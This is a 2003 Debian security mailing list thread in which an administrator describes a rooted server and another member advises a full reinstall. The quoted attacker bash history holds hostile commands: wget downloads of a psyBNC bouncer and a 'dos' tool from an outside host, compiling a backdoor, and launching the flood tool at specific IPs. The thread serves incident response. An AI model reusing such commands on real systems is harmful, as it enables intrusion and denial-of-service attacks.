Re: Strange segmentation faults and Zombies

To: debian-security@lists.debian.org
Subject: Re: Strange segmentation faults and Zombies
From: Josh Carroll <josh.carroll@psualum.com>
Date: Thu, 18 Sep 2003 00:12:02 -0700
Message-id: <[🔎] 20030918071202.GA31631@deblin.org>
In-reply-to: <[🔎] 3F6958B0.1020108@tgm.ac.at>
References: <[🔎] 3F68C446.7070606@tgm.ac.at> <[🔎] 20030917235236.1e9f2ffd.caf@glot.net> <[🔎] 3F6958B0.1020108@tgm.ac.at>

Backup /etc and any other data you have, and you can reference your configuration files later
during your re-install.

At this point, re-installation is a must. Never delude yourself into thinking you can 'recover'
from being rooted. Sure, you might be able to do so after a lot of effort/etc, but then again maybe
you'll forget something and a backdoor will remain. Best bet is to re-install, referencing your
existing configuration files (though I would NOT use them as-is without inspection, since they
could potentially have backdoor'd the configs as well).

Good luck.

Josh


Markus Schabel (markus.schabel@tgm.ac.at) wrote:
> Laurent Corbes {Caf'} wrote:
> >On Wed, 17 Sep 2003 22:29:58 +0200
> >Markus Schabel <markus.schabel@tgm.ac.at> wrote:
> >
> >
> >>I've seen some strange things on my (stable with security-updates)
> >>server: the last apt-get update didn't work because gzip segfaultet.
> >>I've copied gzip from another server over the version on this server,
> >>but it also crashed. Interesting was that the executable was bigger
> >>after the segfault.
> >
> >
> >curious.
> >
> >
> >>In a ps I can see a lot of Zombies (rm, ln, readlink, grep) and I've no
> >>idea where they come from.
> >
> >
> >it's the daily cronjob that stole.
> 
> yes, and that's reproducable :(
> 
> >>You think the server got hacked? Are there any other things that can
> >>lead to this? man also behaves strange, it says either "No manual entry
> >>for...", "What manual page do you want?" or nothing.
> >
> >
> >i'm thinking about a hardware problem. 
> >may the harddrive is in failure (get the ouput of dmesg) or a very big
> >ram problem that corrupt files on the hard drive.
> 
> request_module[net-pf-14]: waitpid(15400,...) failed, errno 1
> ptrace uses obsolete (PF_INET,SOCK_PACKET)
> eth0: Promiscuous mode enabled.
> device eth0 entered promiscuous mode
> eth0: Promiscuous mode enabled.
> 
> but nothing about the disks
> 
> >in every case simply copy all the data you can and inspect the hdd in
> >another box mounting it read only.
> 
> setuid.changes lists /dev/* and the following programs:
> pppd
> postdrop
> postqueue
> wall
> newgrp
> at
> chage
> chfn
> chsh
> expiry
> gpasswd
> passwd
> write
> crontab
> dotlockfile
> ssh-keysign
> procmail
> lockfile
> popauth
> pt_chown
> traceroute
> mount
> umount
> login
> su
> ping
> suexec
> /usr/lib/mc/bin/cons.saver
> 
> and a new user exists in /etc/passwd: slacks:x:0:0::/etc/.rpn:/bin/bash
> 
> in /etc/.rpn theres a .bash_history with the following content:
> 
> >id
> >mkdir /etc/.rpn
> >ps -aux
> >ps -aux | grep tbk
> >kill -15292 pid
> >kill 15292
> >netconf
> >locate httpd.conf
> >cd /etc/.rpn
> >ls -al
> >wget
> >cd /var/www/cncmap/www/upload/renegade
> >ls -al
> >rm -rf phpshell.php
> >cat bd.c
> >gcc -o bd bd.c
> >ftp ftp.hpg.com.br
> >rm -rf bd.c
> >cd /tmp
> >cd /etc/.rpn
> >wget www.slacks.hpg.com.br/psyBNC.tar.gz
> >tar zvxf psyBNC.tar.gz
> >tar -zvxf psyBNC.tar.gz
> >tar
> >gunzip psyBNC.tar.gz
> >tar -Acdtrux psyBNC.tar.gz
> >tar -x psyBNC.tar.gz
> >tar -Acd psyBNC.tar.gz
> >tar -cd psyBNC.tar.gz
> >tar --help
> >pwd
> >ls
> >rm -rf *
> >wget www.slacks.hpg.com.br/bin/dos
> >chmod +x dos
> >./dos
> >./dos 200.101.87.8 65535 8569
> >./dos 200.199.95.11 65535 8569
> 
> and the executable dos
> 
> interesting is the line "tar --help" :D
> 
> in "last" I see the following:
> 
> >slacks   pts/0        Sun Sep 14 02:26 - 03:37  (01:11)     
> >200-147-107-35.tlm.dialuol.com.br
> 
> IP of the hacker is 200.147.107.35
> I think we have no chance of legal actions against .br?
> 
> in the directory /var/www/cncmap/www/upload/renegade there are the
> following files: backhole.pl
> e.c ("Copyright (c) 2003 DTORS Security, ANGELO ROSIELLO 18/02/2003, 
> LES-EXPLOIT for Linux x86")
> rem.php (phpRemoteView)
> 
> so we got hacked :(
> 
> what informations should we gather before we reinstall the complete
> server? I think we have to reinstall the whole thing or do you have
> any ideas?
> 
> thanks
> Markus
> 
> 
> -- 
> To UNSUBSCRIBE, email to debian-security-request@lists.debian.org
> with a subject of "unsubscribe". Trouble? Contact 
> listmaster@lists.debian.org
>

Reply to:

Follow-Ups:
- Re: Strange segmentation faults and Zombies
  - From: "Christian Storch" <storch@infra.net>

References:
- Strange segmentation faults and Zombies
  - From: Markus Schabel <markus.schabel@tgm.ac.at>
- Re: Strange segmentation faults and Zombies
  - From: Laurent Corbes {Caf'} <caf@glot.net>
- Re: Strange segmentation faults and Zombies
  - From: Markus Schabel <markus.schabel@tgm.ac.at>

Prev by Date: Re: Strange segmentation faults and Zombies
Next by Date: Re: about sendmail hole - relay restrictions bypassed
Previous by thread: Re: Strange segmentation faults and Zombies
Next by thread: Re: Strange segmentation faults and Zombies
Index(es):
- Date
- Thread